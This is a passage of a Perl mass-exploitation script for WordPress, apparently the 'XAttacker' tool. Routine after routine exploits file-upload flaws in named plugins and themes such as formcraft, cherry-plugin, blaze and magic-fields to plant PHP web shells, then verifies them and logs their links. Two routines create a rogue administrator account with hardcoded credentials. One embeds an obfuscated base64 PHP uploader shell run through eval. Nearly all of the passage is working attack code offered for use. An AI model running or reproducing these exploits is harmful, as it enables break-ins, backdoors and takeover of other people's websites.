  1630. print color('bold green'),"] ";
  1631. print color('bold white'),"Shell Uploaded Successfully\n";
  1632. print color('bold white'),"  [Link] => $addblockup\n";
  1633. open (TEXT, '>>Result/Shells.txt');
  1634. print TEXT "$addblockup\n";
  1635. close (TEXT);
  1636. }else{
  1637. print color('bold red'),"[";
  1638. print color('bold green'),"+";
  1639. print color('bold red'),"] ";
  1640. print color('bold white'),"social-network";
  1641. print color('bold white')," .................... ";
  1642. print color('bold red'),"Failed";
  1643. print color('bold white'),"\n";}
  1644. }
  1645. ################ Viral Options #####################
  1646. sub viraldd(){
  1647.  
  1648. my $addblockurl = "$site/wp-admin/admin-ajax.php";
  1649. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => ["action" => "nm_filemanager_upload_file","name" => "upload.php", file => ["tool/XAttacker.php"]]);
  1650. $addblockup="$site/wp-content/uploads/user_uploads/upload.php?X=Attacker";
  1651. my $checkaddblock = $ua->get("$addblockup")->content;
  1652.  
  1653. if($checkaddblock =~/X Attacker/) {
  1654. print color('bold red'),"[";
  1655. print color('bold green'),"+";
  1656. print color('bold red'),"] ";
  1657. print color('bold white'),"Front end file";
  1658. print color('bold white')," ................ ";
  1659. print color('bold white'),"";
  1660. print color('bold green'),"VULN";
  1661. print color('bold white'),"\n";
  1662. print color('bold green')," [";
  1663. print color('bold red'),"+";
  1664. print color('bold green'),"] ";
  1665. print color('bold white'),"Shell Uploaded Successfully\n";
  1666. print color('bold white'),"  [Link] => $addblockup\n";
  1667. open (TEXT, '>>Result/Shells.txt');
  1668. print TEXT "$addblockup\n";
  1669. close (TEXT);
  1670. }else{
  1671. print color('bold red'),"[";
  1672. print color('bold green'),"+";
  1673. print color('bold red'),"] ";
  1674. print color('bold white'),"Front end file";
  1675. print color('bold white')," .................... ";
  1676. print color('bold red'),"Failed";
  1677. print color('bold white'),"\n";}
  1678. }
  1679.  
  1680. ################ magic-fields #####################
  1681. sub wof2(){
  1682. my $url = "$site/wp-content/plugins/magic-fields/RCCWP_upload_ajax.php";
  1683.  
  1684. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ 'qqfile' => ["tool/XAttacker.php"] ]);
  1685.  
  1686. $zoomerup="$site/wp-content/files_mf/XAttacker.php?X=Attacker";
  1687. my $checkdm = $ua->get("$zoomerup")->content;
  1688. if($checkdm =~/X Attacker/) {
  1689. print color('bold red'),"[";
  1690. print color('bold green'),"+";
  1691. print color('bold red'),"] ";
  1692. print color('bold white'),"magic-fields";
  1693. print color('bold white')," ...................... ";
  1694. print color('bold green'),"VULN";
  1695. print color('bold white'),"\n";
  1696. print color('bold green')," [";
  1697. print color('bold red'),"+";
  1698. print color('bold green'),"] ";
  1699. print color('bold white'),"Shell Uploaded Successfully\n";
  1700. print color('bold white'),"  [Link] => $zoomerup\n";
  1701. open (TEXT, '>>Result/Shells.txt');
  1702. print TEXT "$zoomerup\n";
  1703. close (TEXT);
  1704. }else{
  1705. print color('bold red'),"[";
  1706. print color('bold green'),"+";
  1707. print color('bold red'),"] ";
  1708. print color('bold white'),"magic-fields";
  1709. print color('bold white')," ...................... ";
  1710. print color('bold red'),"Failed";
  1711. print color('bold white'),"\n";
  1712. }
  1713. }
  1714.  
  1715. ################ estatic #####################
  1716. sub wof3(){
  1717. my $url = "$site";
  1718.  
  1719. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ "value" => "Import",'importfile' => ["tool/XAttacker.php"] ]);
  1720.  
  1721. $zoomerup="$site/wp-content/plugins/ecstatic/XAttacker.php?X=Attacker";
  1722. my $checkdm = $ua->get("$zoomerup")->content;
  1723. if($checkdm =~/X Attacker/) {
  1724. print color('bold red'),"[";
  1725. print color('bold green'),"+";
  1726. print color('bold red'),"] ";
  1727. print color('bold white'),"Ecstatic Exp";
  1728. print color('bold white')," ...................... ";
  1729. print color('bold green'),"VULN";
  1730. print color('bold white'),"\n";
  1731. print color('bold green')," [";
  1732. print color('bold red'),"+";
  1733. print color('bold green'),"] ";
  1734. print color('bold white'),"Shell Uploaded Successfully\n";
  1735. print color('bold white'),"  [Link] => $zoomerup\n";
  1736. open (TEXT, '>>Result/Shells.txt');
  1737. print TEXT "$zoomerup\n";
  1738. close (TEXT);
  1739. }else{
  1740. print color('bold red'),"[";
  1741. print color('bold green'),"+";
  1742. print color('bold red'),"] ";
  1743. print color('bold white'),"Ecstatic Exp";
  1744. print color('bold white')," ...................... ";
  1745. print color('bold red'),"Failed";
  1746. print color('bold white'),"\n";
  1747. }
  1748. }
  1749.  
  1750. ################ woocommerce-custom-t-shirt-designer #####################
  1751. sub tst(){
  1752. my $url = "$site/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-deep-gray/designit/cs/upload.php";
  1753.  
  1754. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ "value" => "./",'uploadfile' => ["tool/XAttacker.php"] ]);
  1755.  
  1756. if ($response->content =~ /(.*?)php/) {
  1757. $uploadfolder=$1.'php';
  1758. }
  1759. $zoomerup="$site/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-white/designit/cs/uploadImage/$uploadfolder";
  1760. my $checkdm = $ua->get("$zoomerup")->content;
  1761. if($checkdm =~/X Attacker/) {
  1762. print color('bold red'),"[";
  1763. print color('bold green'),"+";
  1764. print color('bold red'),"] ";
  1765. print color('bold white'),"custom-t-shirt";
  1766. print color('bold white')," .................... ";
  1767. print color('bold green'),"VULN";
  1768. print color('bold white'),"\n";
  1769. print color('bold green')," [";
  1770. print color('bold red'),"+";
  1771. print color('bold green'),"] ";
  1772. print color('bold white'),"Shell Uploaded Successfully\n";
  1773. print color('bold white'),"  [Link] => $zoomerup\n";
  1774. open (TEXT, '>>Result/Shells.txt');
  1775. print TEXT "$zoomerup\n";
  1776. close (TEXT);
  1777. }else{
  1778. print color('bold red'),"[";
  1779. print color('bold green'),"+";
  1780. print color('bold red'),"] ";
  1781. print color('bold white'),"custom-t-shirt";
  1782. print color('bold white')," .................... ";
  1783. print color('bold red'),"Failed";
  1784. print color('bold white'),"\n";
  1785. }
  1786. }
  1787. ################ ninetofive tema file upload #####################
  1788. sub xxcc(){
  1789. my $url = "$site/wp-content/plugins/wp-simple-cart/request/simple-cart-upload.php";
  1790.  
  1791. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ 'userfile' => ["tool/XAttacker.php"] ]);
  1792.  
  1793. if ($response->content =~ /files(.*?)temporary/) {
  1794. $uploadfolder=$1;
  1795. }
  1796. $zoomerup="$site//wp-content/plugins/wp-simple-cart/files/$uploadfolder/temporary/XAttacker.php?X=Attacker";
  1797. my $checkdm = $ua->get("$zoomerup")->content;
  1798. if($checkdm =~/X Attacker/) {
  1799. print color('bold red'),"[";
  1800. print color('bold green'),"+";
  1801. print color('bold red'),"] ";
  1802. print color('bold white'),"simple-cartexp";
  1803. print color('bold white')," .................... ";
  1804. print color('bold green'),"VULN";
  1805. print color('bold white'),"\n";
  1806. print color('bold green')," [";
  1807. print color('bold red'),"+";
  1808. print color('bold green'),"] ";
  1809. print color('bold white'),"Shell Uploaded Successfully\n";
  1810. print color('bold white'),"  [Link] => $zoomerup\n";
  1811. open (TEXT, '>>Result/Shells.txt');
  1812. print TEXT "$zoomerup\n";
  1813. close (TEXT);
  1814. }else{
  1815. print color('bold red'),"[";
  1816. print color('bold green'),"+";
  1817. print color('bold red'),"] ";
  1818. print color('bold white'),"simple-cartexp";
  1819. print color('bold white')," .................... ";
  1820. print color('bold red'),"Failed";
  1821. print color('bold white'),"\n";
  1822. }
  1823. }
  1824.  
  1825. ################ ninetofive tema file upload #####################
  1826. sub nineto(){
  1827. my $url = "$site/wp-content/themes/ninetofive/scripts/doajaxfileupload.php";
  1828.  
  1829. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ 'qqfile' => ["tool/XAttacker.php"] ]);
  1830.  
  1831. if ($response->content =~ /uploads%2F(.*?); expires/) {
  1832. $uploadfolder=$1.'?X=Attacker';
  1833. }
  1834. $zoomerup="$site/wp-content/themes/ninetofive/scripts/uploads/$uploadfolder";
  1835. my $checkdm = $ua->get("$zoomerup")->content;
  1836. if($checkdm =~/X Attacker/) {
  1837. print color('bold red'),"[";
  1838. print color('bold green'),"+";
  1839. print color('bold red'),"] ";
  1840. print color('bold white'),"Ninetofive Exp";
  1841. print color('bold white')," .................... ";
  1842. print color('bold green'),"VULN";
  1843. print color('bold white'),"\n";
  1844. print color('bold green')," [";
  1845. print color('bold red'),"+";
  1846. print color('bold green'),"] ";
  1847. print color('bold white'),"Shell Uploaded Successfully\n";
  1848. print color('bold white'),"  [Link] => $zoomerup\n";
  1849. open (TEXT, '>>Result/Shells.txt');
  1850. print TEXT "$zoomerup\n";
  1851. close (TEXT);
  1852. }else{
  1853. ninetof();
  1854. }
  1855. }
  1856. sub ninetof(){
  1857. my $url = "$site/wp-content/themes/ninetofive/scripts/doajaxfileupload.php";
  1858.  
  1859. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ 'qqfile' => ["tool/XAttacker.php"] ]);
  1860.  
  1861. if ($response->content =~ /uploads%2F(.*?); expires/) {
  1862. $uploadfolder=$1.'?X=Attacker';
  1863. }
  1864. $zoomerup="$site/wp-content/uploads/$year/$month/$uploadfolder";
  1865. my $checkdm = $ua->get("$zoomerup")->content;
  1866. if($checkdm =~/X Attacker/) {
  1867. print color('bold red'),"[";
  1868. print color('bold green'),"+";
  1869. print color('bold red'),"] ";
  1870. print color('bold white'),"Ninetofive Exp";
  1871. print color('bold white')," .................... ";
  1872. print color('bold green'),"VULN";
  1873. print color('bold white'),"\n";
  1874. print color('bold green')," [";
  1875. print color('bold red'),"+";
  1876. print color('bold green'),"] ";
  1877. print color('bold white'),"Shell Uploaded Successfully\n";
  1878. print color('bold white'),"  [Link] => $zoomerup\n";
  1879. open (TEXT, '>>Result/Shells.txt');
  1880. print TEXT "$zoomerup\n";
  1881. close (TEXT);
  1882. }else{
  1883. print color('bold red'),"[";
  1884. print color('bold green'),"+";
  1885. print color('bold red'),"] ";
  1886. print color('bold white'),"Ninetofive Exp";
  1887. print color('bold white')," .................... ";
  1888. print color('bold red'),"Failed";
  1889. print color('bold white'),"\n";
  1890. }
  1891. }
  1892.  
  1893. ################ Viral Options #####################
  1894. sub viral(){
  1895.  
  1896. my $addblockurl = "$site/wp-content/plugins/viral-optins/api/uploader/file-uploader.php";
  1897. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [Filedata => ["tool/XAttacker.php"]]);
  1898. $addblockup="$site/wp-content/uploads/$year/$month/XAttacker.php?X=Attacker";
  1899. my $checkaddblock = $ua->get("$addblockup")->content;
  1900.  
  1901. if($checkaddblock =~/X Attacker/) {
  1902. print color('bold red'),"[";
  1903. print color('bold green'),"+";
  1904. print color('bold red'),"] ";
  1905. print color('bold white'),"Viral Options";
  1906. print color('bold white')," ................. ";
  1907. print color('bold white'),"";
  1908. print color('bold green'),"VULN";
  1909. print color('bold white'),"\n";
  1910. print color('bold green')," [";
  1911. print color('bold red'),"+";
  1912. print color('bold green'),"] ";
  1913. print color('bold white'),"Shell Uploaded Successfully\n";
  1914. print color('bold white'),"  [Link] => $addblockup\n";
  1915. open (TEXT, '>>Result/Shells.txt');
  1916. print TEXT "$addblockup\n";
  1917. close (TEXT);
  1918. }else{
  1919. print color('bold red'),"[";
  1920. print color('bold green'),"+";
  1921. print color('bold red'),"] ";
  1922. print color('bold white'),"Viral Options";
  1923. print color('bold white')," ..................... ";
  1924. print color('bold red'),"Failed";
  1925. print color('bold white'),"\n";}
  1926. }
  1927.  
  1928. ################ jsor-sliders #####################
  1929. sub jsor(){
  1930.  
  1931. my $addblockurl = "$site/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library";
  1932. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [file => ["tool/XAttacker.php"]]);
  1933. $addblockup="$site/wp-content/jssor-slider/jssor-uploads/XAttacker.php?X=Attacker";
  1934. my $checkaddblock = $ua->get("$addblockup")->content;
  1935.  
  1936. if($checkaddblock =~/X Attacker/) {
  1937. print color('bold red'),"[";
  1938. print color('bold green'),"+";
  1939. print color('bold red'),"] ";
  1940. print color('bold white'),"Jsor-Sliders";
  1941. print color('bold white')," ...................... ";
  1942. print color('bold white'),"";
  1943. print color('bold green'),"VULN";
  1944. print color('bold white'),"\n";
  1945. print color('bold green')," [";
  1946. print color('bold red'),"+";
  1947. print color('bold green'),"] ";
  1948. print color('bold white'),"Shell Uploaded Successfully\n";
  1949. print color('bold white'),"  [Link] => $addblockup\n";
  1950. open (TEXT, '>>Result/Shells.txt');
  1951. print TEXT "$addblockup\n";
  1952. close (TEXT);
  1953. }else{
  1954. jsordef();
  1955. }
  1956. }
  1957. sub jsordef(){
  1958. my $addblockurl = "$site/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library";
  1959. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [file => ["tool/XAttacker.txt"]]);
  1960. $addblockup="$site/wp-content/jssor-slider/jssor-uploads/XAttacker.txt";
  1961. my $checkaddblock = $ua->get("$addblockup")->content;
  1962.  
  1963. if($checkaddblock =~/X Attacker/) {
  1964. print color('bold red'),"[";
  1965. print color('bold green'),"+";
  1966. print color('bold red'),"] ";
  1967. print color('bold white'),"Jsor-Sliders";
  1968. print color('bold white')," ...................... ";
  1969. print color('bold white'),"";
  1970. print color('bold green'),"VULN";
  1971. print color('bold white'),"\n";
  1972. print color('bold green')," [";
  1973. print color('bold red'),"+";
  1974. print color('bold green'),"] ";
  1975. print color('bold white'),"Shell Uploaded Successfully\n";
  1976. print color('bold white'),"  [Link] => $addblockup\n";
  1977. open (TEXT, '>>Result/Shells.txt');
  1978. print TEXT "$addblockup\n";
  1979. close (TEXT);
  1980. }else{
  1981. print color('bold red'),"[";
  1982. print color('bold green'),"+";
  1983. print color('bold red'),"] ";
  1984. print color('bold white'),"Jsor-Sliders";
  1985. print color('bold white')," ...................... ";
  1986. print color('bold red'),"Failed";
  1987. print color('bold white'),"\n";}
  1988. }
  1989.  
  1990. ################ wp-tema #####################
  1991. sub wptema(){
  1992. my $url = "$site/wp-content/themes/clockstone/theme/functions/uploadbg.php";
  1993. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  1994. $ua->timeout(20);
  1995. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  1996.  
  1997. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ "value" => "./",'uploadfile' => ["tool/izom.php"] ]);
  1998.  
  1999. $dump = "$site/wp-content/themes/clockstone/theme/functions/e3726adb9493beb4e8e2dabe65ea10ef.php";
  2000. if($response->content =~/e3726adb9493beb4e8e2dabe65ea10ef/) {
  2001. print color('bold red'),"[";
  2002. print color('bold green'),"+";
  2003. print color('bold red'),"] ";
  2004. print color('bold white'),"clockstone";
  2005. print color('bold white')," ....................... ";
  2006. print color('bold white'),"";
  2007. print color('bold green'),"VULN";
  2008. print color('bold white'),"\n";
  2009. print color('bold green')," [";
  2010. print color('bold red'),"+";
  2011. print color('bold green'),"] ";
  2012. print color('bold white'),"Shell Uploaded Successfully\n";
  2013. print color('bold white'),"  [Link] => $dump\n";
  2014. open (TEXT, '>>Result/Shells.txt');
  2015. print TEXT "$dump\n";
  2016. close (TEXT);
  2017. }else{
  2018. print color('bold red'),"[";
  2019. print color('bold green'),"+";
  2020. print color('bold red'),"] ";
  2021. print color('bold white'),"clockstone";
  2022. print color('bold white')," ........................ ";
  2023. print color('bold red'),"Failed";
  2024. print color('bold white'),"\n";
  2025. }
  2026. }
  2027.  
  2028. ################ Blaze #####################
  2029. sub blaze(){
  2030. my $url = "$site/wp-admin/admin.php?page=blaze_manage";
  2031. my $blazeres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'blaze_add_new_album', album_name => '', album_desc => '',]);
  2032.  
  2033. if ($blazeres->content =~ /\/uploads\/blaze\/(.*?)\/big\/XAttacker.php/) {
  2034. $uploadfolder=$1;
  2035. $blazeup="$site/wp-content/uploads/blaze/$uploadfolder/big/XAttacker.php?X=Attacker";
  2036. print color('bold red'),"[";
  2037. print color('bold green'),"+";
  2038. print color('bold red'),"] ";
  2039. print color('bold white'),"Blaze";
  2040. print color('bold white')," ............................. ";
  2041. print color('bold white'),"";
  2042. print color('bold green'),"VULN";
  2043. print color('bold white'),"\n";
  2044. print color('bold green')," [";
  2045. print color('bold red'),"+";
  2046. print color('bold green'),"] ";
  2047. print color('bold white'),"Shell Uploaded Successfully\n";
  2048. print color('bold white'),"  [Link] => $blazeup\n";
  2049. open (TEXT, '>>Result/Shells.txt');
  2050. print TEXT "$blazeup\n";
  2051. close (TEXT);
  2052. }else{
  2053. print color('bold red'),"[";
  2054. print color('bold green'),"+";
  2055. print color('bold red'),"] ";
  2056. print color('bold white'),"Blaze";
  2057. print color('bold white')," ............................. ";
  2058. print color('bold red'),"Failed";
  2059. print color('bold white'),"\n";
  2060. }
  2061. }
  2062.  
  2063. ################ Catpro #####################
  2064. sub catpro(){
  2065.  
  2066. my $url = "$site/wp-admin/admin.php?page=catpro_manage";
  2067. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'cpr_add_new_album', album_name => '', album_desc => '',]);
  2068.  
  2069. if ($response->content =~ /\/uploads\/catpro\/(.*?)\/big\/XAttacker.php/) {
  2070. $uploadfolder=$1;
  2071. $catproup="$site/wp-content/uploads/catpro/$uploadfolder/big/XAttacker.php?X=Attacker";
  2072. print color('bold red'),"[";
  2073. print color('bold green'),"+";
  2074. print color('bold red'),"] ";
  2075. print color('bold white'),"Catpro";
  2076. print color('bold white')," ............................ ";
  2077. print color('bold white'),"";
  2078. print color('bold green'),"VULN";
  2079. print color('bold white'),"\n";
  2080. print color('bold green')," [";
  2081. print color('bold red'),"+";
  2082. print color('bold green'),"] ";
  2083. print color('bold white'),"Shell Uploaded Successfully\n";
  2084. print color('bold white'),"  [Link] => $catproup\n";
  2085. open (TEXT, '>>Result/Shells.txt');
  2086. print TEXT "$catproup\n";
  2087. close (TEXT);
  2088. }else{
  2089. print color('bold red'),"[";
  2090. print color('bold green'),"+";
  2091. print color('bold red'),"] ";
  2092. print color('bold white'),"Catpro";
  2093. print color('bold white')," ............................ ";
  2094. print color('bold red'),"Failed";
  2095. print color('bold white'),"\n";
  2096. }
  2097. }
  2098.  
  2099.  
  2100. ################ Cherry Plugin #####################
  2101. sub cherry(){
  2102.  
  2103. my $url = "$site/wp-content/plugins/cherry-plugin/admin/import-export/upload.php";
  2104. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [file => ["tool/XAttacker.php"],]);
  2105.  
  2106. $cherryup="$site/wp-content/plugins/cherry-plugin/admin/import-export/XAttacker.php?X=Attacker";
  2107.  
  2108. my $checkcherry = $ua->get("$cherryup")->content;
  2109. if($checkcherry =~/X Attacker/) {
  2110. print color('bold red'),"[";
  2111. print color('bold green'),"+";
  2112. print color('bold red'),"] ";
  2113. print color('bold white'),"Cherry Plugin";
  2114. print color('bold white')," ..................... ";
  2115. print color('bold white'),"";
  2116. print color('bold green'),"VULN";
  2117. print color('bold white'),"\n";
  2118. print color('bold green')," [";
  2119. print color('bold red'),"+";
  2120. print color('bold green'),"] ";
  2121. print color('bold white'),"Shell Uploaded Successfully\n";
  2122. print color('bold white'),"  [Link] => $cherryup\n";
  2123. open (TEXT, '>>Result/Shells.txt');
  2124. print TEXT "$cherryup\n";
  2125. close (TEXT);
  2126. }else{
  2127. print color('bold red'),"[";
  2128. print color('bold green'),"+";
  2129. print color('bold red'),"] ";
  2130. print color('bold white'),"Cherry Plugin";
  2131. print color('bold white')," ..................... ";
  2132. print color('bold red'),"Failed";
  2133. print color('bold white'),"\n";
  2134. }
  2135. }
  2136.  
  2137. ################ Download Manager #####################
  2138. sub downloadsmanager(){
  2139. $downloadsmanagervuln="$site/wp-content/plugins/downloads-manager/readme.txt";
  2140. my $url = "$site";
  2141. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [upfile => ["tool/XAttacker.php"], dm_upload => '',]);
  2142. $dmup="$site/wp-content/plugins/downloads-manager/upload/XAttacker.php?X=Attacker";
  2143. my $checkdm = $ua->get("$dmup")->content;
  2144. if($checkdm =~/X Attacker/) {
  2145. print color('bold red'),"[";
  2146. print color('bold green'),"+";
  2147. print color('bold red'),"] ";
  2148. print color('bold white'),"Download Manager";
  2149. print color('bold white')," .................. ";
  2150. print color('bold green'),"VULN";
  2151. print color('bold white'),"\n";
  2152. print color('bold green')," [";
  2153. print color('bold red'),"+";
  2154. print color('bold green'),"] ";
  2155. print color('bold white'),"Shell Uploaded Successfully\n";
  2156. print color('bold white'),"  [Link] => $dmup\n";
  2157. open (TEXT, '>>Result/Shells.txt');
  2158. print TEXT "$dmup\n";
  2159. close (TEXT);
  2160. }else{
  2161. print color('bold red'),"[";
  2162. print color('bold green'),"+";
  2163. print color('bold red'),"] ";
  2164. print color('bold white'),"Download Manager";
  2165. print color('bold white')," .................. ";
  2166. print color('bold red'),"Failed";
  2167. print color('bold white'),"\n";
  2168. }
  2169. }
  2170.  
  2171. ################ Download Manager RCE #####################
  2172. sub expadd(){
  2173.  
  2174. my  $user = "izocin";
  2175. my  $pass = "izocin";
  2176. my $body = $ua->post( $site,
  2177.         Cookie => "",
  2178.         Content_Type => 'form-data',
  2179.         Content => [action => "wpdm_ajax_call", execute => "wp_insert_user", user_login => $user,
  2180.         user_pass => $pass, role => "administrator",]
  2181.    );
  2182.    my $html =$body->content;
  2183.    my $string_len =  length( $html );
  2184.    if ($string_len eq 0){
  2185. print color('bold red'),"[";
  2186. print color('bold green'),"+";
  2187. print color('bold red'),"] ";
  2188. print color('bold white'),"Download Manager RCE";
  2189. print color('bold white')," .............. ";
  2190. print color('bold green'),"VULN";
  2191. print color('bold white'),"\n";
  2192. print color('bold green'), "[OK] Exploiting Success\n";
  2193. print color('bold green'), "[!] login = ".$site."/wp-login.php\n";
  2194. print color('bold green'), "[!] User = ".$user."\n";
  2195. print color('bold green'), "[!] Pass = ".$pass."\n";
  2196. open (TEXT, '>>Result/wprce.txt');
  2197. print TEXT "$site/wp-login.php\n","$user\n","$pass\n";
  2198. close (TEXT);
  2199.    }
  2200.    elsif ($string_len != 0){
  2201. print color('bold red'),"[";
  2202. print color('bold green'),"+";
  2203. print color('bold red'),"] ";
  2204. print color('bold white'),"Download Manager RCE";
  2205. print color('bold white')," .............. ";
  2206. print color('bold red'),"Failed";
  2207. print color('bold white'),"\n";
  2208. }
  2209. }
  2210.  
  2211. ################ wordpress Marketplace Manager RCE #####################
  2212. sub expaddd(){
  2213.  
  2214. my  $user = "izocin";
  2215. my  $pass = "izocin";
  2216. my $body = $ua->post( $site,
  2217.         Cookie => "",
  2218.         Content_Type => 'form-data',
  2219.         Content => [action => "wpmp_pp_ajax_call", execute => "wp_insert_user", user_login => $user,
  2220.         user_pass => $pass, role => "administrator",]
  2221.    );
  2222.    my $html =$body->content;
  2223.    my $string_len =  length( $html );
  2224.    if ($string_len eq 0){
  2225. print color('bold red'),"[";
  2226. print color('bold green'),"+";
  2227. print color('bold red'),"] ";
  2228. print color('bold white'),"WP Marketplace RCE";
  2229. print color('bold white')," ................ ";
  2230. print color('bold green'),"VULN";
  2231. print color('bold white'),"\n";
  2232. print color('bold green'), "[OK] Exploiting Success\n";
  2233. print color('bold green'), "[!] login = ".$site."/wp-login.php\n";
  2234. print color('bold green'), "[!] User = ".$user."\n";
  2235. print color('bold green'), "[!] Pass = ".$pass."\n";
  2236. open (TEXT, '>>Result/wprce.txt');
  2237. print TEXT "$site/wp-login.php\n","$user\n","$pass\n";
  2238. close (TEXT);
  2239. }
  2240.    elsif ($string_len != 0){
  2241. print color('bold red'),"[";
  2242. print color('bold green'),"+";
  2243. print color('bold red'),"] ";
  2244. print color('bold white'),"WP Marketplace RCE";
  2245. print color('bold white')," ................ ";
  2246. print color('bold red'),"Failed";
  2247. print color('bold white'),"\n";
  2248. }
  2249. }
  2250.  
  2251. ################ Formcraft #####################
  2252. sub formcraft(){
  2253. my $url = "$site/wp-content/plugins/formcraft/file-upload/server/php/";
  2254. my $shell ="tool/XAttacker.php";
  2255. my $field_name = "files[]";
  2256.  
  2257. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  2258. $formcraftup="$site/wp-content/plugins/formcraft/file-upload/server/php/files/XAttacker.php?X=Attacker";
  2259.  
  2260. if ($response->content =~ /{"files/) {
  2261. print color('bold red'),"[";
  2262. print color('bold green'),"+";
  2263. print color('bold red'),"] ";
  2264. print color('bold white'),"Formcraft";
  2265. print color('bold white')," ......................... ";
  2266. print color('bold green'),"VULN";
  2267. print color('bold white'),"\n";
  2268. print color('bold green')," [";
  2269. print color('bold red'),"+";
  2270. print color('bold green'),"] ";
  2271. print color('bold white'),"Shell Uploaded Successfully\n";
  2272. print color('bold white'),"  [Link] => $formcraftup\n";
  2273. open (TEXT, '>>Result/Shells.txt');
  2274. print TEXT "$formcraftup\n";
  2275. close (TEXT);
  2276. }else{
  2277. print color('bold red'),"[";
  2278. print color('bold green'),"+";
  2279. print color('bold red'),"] ";
  2280. print color('bold white'),"Formcraft";
  2281. print color('bold white')," ......................... ";
  2282. print color('bold red'),"Failed";
  2283. print color('bold white'),"\n";
  2284. }
  2285. }
  2286. ################ Formcraft 2#####################
  2287. sub formcraft2(){
  2288. my $url = "$site/wp-content/plugins/formcraft/file-upload/server/content/upload.php";
  2289. my $shell ="tool/m-a.phtml";
  2290. my $field_name = "files[]";
  2291.  
  2292. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  2293.  
  2294. my $body = $response->content;
  2295. my $regex='name":"(.*)","new_name":"(.*?)"';
  2296. if($body =~ s/$regex//){
  2297. my $out = $1;my $newout=$2;
  2298. print "[Name File] $out \n";
  2299. print "[New Name] $newout\n";
  2300. $formcraft2up="$site/wp-content/plugins/formcraft/file-upload/server/content/files/$newout";
  2301. print color('bold red'),"[";
  2302. print color('bold green'),"+";
  2303. print color('bold red'),"] ";
  2304. print color('bold white'),"Formcraft2";
  2305. print color('bold white')," ......................... ";
  2306. print color('bold green'),"VULN";
  2307. print color('bold white'),"\n";
  2308. print color('bold green')," [";
  2309. print color('bold red'),"+";
  2310. print color('bold green'),"] ";
  2311. print color('bold white'),"Shell Uploaded Successfully\n";
  2312. print color('bold white'),"  [Link] => $formcraft2up\n";
  2313. open (TEXT, '>>Result/Shells.txt');
  2314. print TEXT "$formcraft2up\n";
  2315. close (TEXT);
  2316. }else{
  2317. print color('bold red'),"[";
  2318. print color('bold green'),"+";
  2319. print color('bold red'),"] ";
  2320. print color('bold white'),"Formcraft2";
  2321. print color('bold white')," ........................ ";
  2322. print color('bold red'),"Failed";
  2323. print color('bold white'),"\n";
  2324. }
  2325. }
  2326. sub xav(){
  2327. my $url = "$site/resources/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=test.php";
  2328.  
  2329. my $index='<?php
  2330. eval(bAsE64_DecOde("ZWNobyAnaXpvY2luPGJyPicucGhwX3VuYW1lKCkuJzxmb3JtIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+Jy4nPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gKXtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICdVcGxvYWQgT0snO31lbHNlIHtlY2hvICdVcGxvYWQgRmFpbCc7fX0="));
  2331. ?>';
  2332. my $body = $ua->post( $url,
  2333.         Content_Type => 'multipart/form-data',
  2334.         Content => $index
  2335.         );
  2336.  
  2337. $zoomerup="$site//wp-content/plugins/php-analytics/resources/open-flash-chart/tmp-upload-images/test.php";
  2338.  
  2339. my $checkk = $ua->get("$zoomerup")->content;
  2340. if($checkk =~/izocin/) {
  2341. print color('bold red'),"[";
  2342. print color('bold green'),"+";
  2343. print color('bold red'),"] ";
  2344. print color('bold white'),"open-flash-chart";
  2345. print color('bold white')," .................. ";
  2346. print color('bold green'),"VULN";
  2347. print color('bold white'),"\n";
  2348. print color('bold green')," [";
  2349. print color('bold red'),"+";
  2350. print color('bold green'),"] ";
  2351. print color('bold white'),"Shell Uploaded Successfully\n";
  2352. print color('bold white'),"  [Link] => $zoomerup\n";
  2353. open (TEXT, '>>Result/Shells.txt');
  2354. print TEXT "$zoomerup\n";
  2355. close (TEXT);
  2356. }else{
  2357. print color('bold red'),"[";
  2358. print color('bold green'),"+";
  2359. print color('bold red'),"] ";
  2360. print color('bold white'),"open-flash-chart";
  2361. print color('bold white')," .................. ";
  2362. print color('bold red'),"Failed";
  2363. print color('bold white'),"\n";
  2364. }
  2365. }
  2366. ################ Catpro #####################
  2367. sub izxc(){
  2368.  
  2369. my $url = "$site/wp-admin/admin.php?page=dreamwork_manage";
  2370. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["tool/XAttacker.php"], task => 'drm_add_new_album', album_name => '', album_desc => '',]);
  2371.  
  2372. if ($response->content =~ /\/uploads\/dreamwork\/(.*?)\/big\/XAttacker.php/) {
  2373. $uploadfolder=$1;
